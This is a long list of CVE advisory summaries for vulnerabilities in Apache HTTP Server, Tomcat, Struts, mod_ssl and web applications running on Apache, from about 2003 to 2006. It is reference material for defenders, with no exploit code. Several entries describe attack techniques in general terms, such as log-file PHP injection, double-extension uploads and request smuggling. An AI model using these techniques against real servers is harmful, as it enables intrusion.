6463| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
6464| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
6465| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
6466| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
6467| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
6468| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
6469| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
6470| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
6471| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
6472| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
6473| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
6474| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
6475| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
6476| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
6477| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
6478| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
6479| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
6480| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
6481| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
6482| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
6483| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
6484| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
6485| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
6486| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
6487| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
6488| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
6489| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
6490| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
6491| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
6492| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
6493| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
6494| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
6495| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
6496| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
6497| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
6498| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
6499| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
6500| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
6501| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allow remote attackers to execute arbitrary code via various vectors, including the username.
6502| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
6503| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers to cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
6504| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
6505| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
6506| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
6507| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
6508| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
6509| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
6510| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
6511| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
6512| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
6513| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
6514| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
6515| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
6516| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
6517| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
6518| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
6519| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
6520| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
6521| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
6522| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
6523| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
6524| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
6525| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
6526| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
6527| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
6528| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
6529| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child proccess IDs (PID).
| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
